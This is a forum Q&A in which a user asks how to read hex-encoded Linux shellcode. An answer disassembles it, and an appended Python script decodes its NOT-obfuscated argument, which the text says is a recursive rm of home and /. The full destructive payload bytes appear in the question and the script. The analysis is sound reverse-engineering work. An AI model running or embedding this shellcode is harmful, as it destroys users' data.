Reputation: 223
I have noticed a command in the form of hex characters, and it says this is a hex version of a command (Linux). What does it actually mean by "hex version", and how can I convert this to human-readable form? As of now I know:

The command is listed below...

```
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
```

But how can I convert this to the original command in English, like "XXXXXXXX"?
Upvotes: 0
Views: 1393
Reputation: 225132
I took that binary and ran it through `hexdump -vC` and `objdump`:
```
$ objdump -b binary -m i386 -D output

output:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   eb 3e                   jmp    0x40
   2:   5b                      pop    %ebx
   3:   31 c0                   xor    %eax,%eax
   5:   50                      push   %eax
   6:   54                      push   %esp
   7:   5a                      pop    %edx
   8:   83 ec 64                sub    $0x64,%esp
   b:   68 ff ff ff ff          push   $0xffffffff
  10:   68 df d0 df d9          push   $0xd9dfd0df
  15:   68 8d 99 df 81          push   $0x81df998d
  1a:   68 8d 92 df d2          push   $0xd2df928d
  1f:   54                      push   %esp
  20:   5e                      pop    %esi
  21:   f7 16                   notl   (%esi)
  23:   f7 56 04                notl   0x4(%esi)
  26:   f7 56 08                notl   0x8(%esi)
  29:   f7 56 0c                notl   0xc(%esi)
  2c:   83 c4 74                add    $0x74,%esp
  2f:   56                      push   %esi
  30:   8d 73 08                lea    0x8(%ebx),%esi
  33:   56                      push   %esi
  34:   53                      push   %ebx
  35:   54                      push   %esp
  36:   59                      pop    %ecx
  37:   b0 0b                   mov    $0xb,%al
  39:   cd 80                   int    $0x80
  3b:   31 c0                   xor    %eax,%eax
  3d:   40                      inc    %eax
  3e:   eb f9                   jmp    0x39
  40:   e8 bd ff ff ff          call   0x2
  45:   2f                      das
  46:   62 69 6e                bound  %ebp,0x6e(%ecx)
  49:   2f                      das
  4a:   73 68                   jae    0xb4
  4c:   00                      .byte 0x0
  4d:   2d                      .byte 0x2d
  4e:   63 00                   arpl   %ax,(%eax)
        ...
```
```
$ hexdump -vC output
00000000  eb 3e 5b 31 c0 50 54 5a  83 ec 64 68 ff ff ff ff  |.>[1.PTZ..dh....|
00000010  68 df d0 df d9 68 8d 99  df 81 68 8d 92 df d2 54  |h....h....h....T|
00000020  5e f7 16 f7 56 04 f7 56  08 f7 56 0c 83 c4 74 56  |^...V..V..V...tV|
00000030  8d 73 08 56 53 54 59 b0  0b cd 80 31 c0 40 eb f9  |.s.VSTY....1.@..|
00000040  e8 bd ff ff ff 2f 62 69  6e 2f 73 68 00 2d 63 00  |...../bin/sh.-c.|
00000050  00                                                |.|
00000051
```
It does look like some kind of program. First it jumps to offset `0x40` and then uses `call 0x2` to set the stack up; then a bunch of operations including a system call. Program data appears to start at offset `0x45` and contains the string `"/bin/sh -c"`.

The system call in question is #11 (`mov $0xb,%al`), which according to this table is `sys_execve`. I'd guess it's trying to run a shell. Is this code intended to exploit buffer overflows?
Upvotes: 3
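The disassembly above shows `/bin/sh` and `-c` in the clear, but the third argument of the command is only present as four `push $imm32` values that the code flips with `notl` after pushing them. The following script is an added example, not part of the answer or the question: it does statically what the shellcode does at runtime. It follows the `jmp`/`call`/`pop` pair to locate the data at `0x45`, collects the four pushed immediates, lays them out as they sit on the stack (last push at the lowest address, where `push %esp; pop %esi` points `%esi`), undoes the `notl` decoding, and reassembles the `execve` arguments. The register roles assumed (eax=11 is execve, ebx=path, ecx=argv, edx=envp) are the Linux i386 `int $0x80` convention. The shellcode bytes are taken from the question; the decoded third argument is a recursive `rm` of the home directory and `/`, so read the output, do not run the shellcode or the command it builds.

```python
import struct

# The shellcode exactly as quoted in the question, rebuilt here as a bytes
# literal (constructed input for this example; no other sample is used).
SHELLCODE = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
)

JMP_SHORT = 0xEB    # eb rel8
CALL_REL32 = 0xE8   # e8 rel32
PUSH_IMM32 = 0x68   # 68 imm32


def call_data(code):
    """Follow the `jmp short` at offset 0 to the `call rel32` it lands on.
    Returns (callee, data_offset): the call target, and the offset of the
    bytes right after the call, whose address the call leaves on the stack
    for the `pop %ebx` at the callee (the jmp/call/pop trick)."""
    if code[0] != JMP_SHORT:
        raise ValueError("expected jmp short at offset 0")
    rel8 = struct.unpack_from("<b", code, 1)[0]
    target = 2 + rel8                       # next_ip + rel8
    if code[target] != CALL_REL32:
        raise ValueError("jmp does not land on a call")
    rel32 = struct.unpack_from("<i", code, target + 1)[0]
    data_offset = target + 5                # next_ip after the 5-byte call
    return data_offset + rel32, data_offset


def push_imm32_run(code):
    """Byte-scan for the first run of back-to-back `push imm32` instructions
    and return their immediates in execution order. This is a byte scan,
    not a disassembler; it is enough for this straight-line prologue."""
    i = code.index(bytes([PUSH_IMM32]))
    imms = []
    while i + 5 <= len(code) and code[i] == PUSH_IMM32:
        imms.append(struct.unpack_from("<I", code, i + 1)[0])
        i += 5
    return imms


def stack_image(imms):
    """Lay the pushed dwords out as they sit in memory after the pushes.
    Each push lowers %esp by 4, so the last value pushed ends up at the
    lowest address, which is where `push %esp; pop %esi` points %esi."""
    mem = bytearray()
    for imm in imms:
        mem[0:0] = struct.pack("<I", imm)   # prepend == push
    return bytes(mem)


def undo_notl(mem):
    """The in-place `notl (%esi)`, `notl 0x4(%esi)`, ... decoding is a
    bitwise NOT of every byte. NOT is its own inverse, so the same function
    both models what the shellcode does and recovers the plaintext."""
    return bytes(b ^ 0xFF for b in mem)


def cstring(buf, offset=0):
    """Read a NUL-terminated ASCII string starting at offset."""
    return buf[offset:buf.index(b"\x00", offset)].decode("ascii")


def recover_execve(code=SHELLCODE):
    """Reconstruct the execve(path, argv, envp) call the shellcode makes.
    Linux i386 int 0x80 convention (assumed here): eax=11 is execve,
    ebx=path, ecx=argv, edx=envp. edx points at the NULL dword pushed by
    `push %eax` right after `xor %eax,%eax`, so envp is empty, and that
    same NULL terminates argv because argv is pushed on top of it."""
    _, data_offset = call_data(code)
    data = code[data_offset:]
    path = cstring(data)                    # %ebx after `pop %ebx`
    flag = cstring(data, len(path) + 1)     # `lea 0x8(%ebx),%esi`: 8 == len("/bin/sh") + 1
    arg = cstring(undo_notl(stack_image(push_imm32_run(code))))
    # argv order follows the pushes: `push %esi` (arg), `push %esi` (flag),
    # `push %ebx` (path); `push %esp; pop %ecx` then makes %ecx point at it.
    return path, [path, flag, arg]


if __name__ == "__main__":
    path, argv = recover_execve()
    print("execve(%r, %r, [])" % (path, argv))
```

The same push-then-decode pattern (NOT or XOR applied to immediates already on the stack) is common in hand-written shellcode because it keeps bytes like `0x00` and `0x2f` out of the code; whenever `objdump` shows a run of `push $imm32` followed by `notl`/`xorl` on `(%esi)`, this is the decode to apply before reading the string.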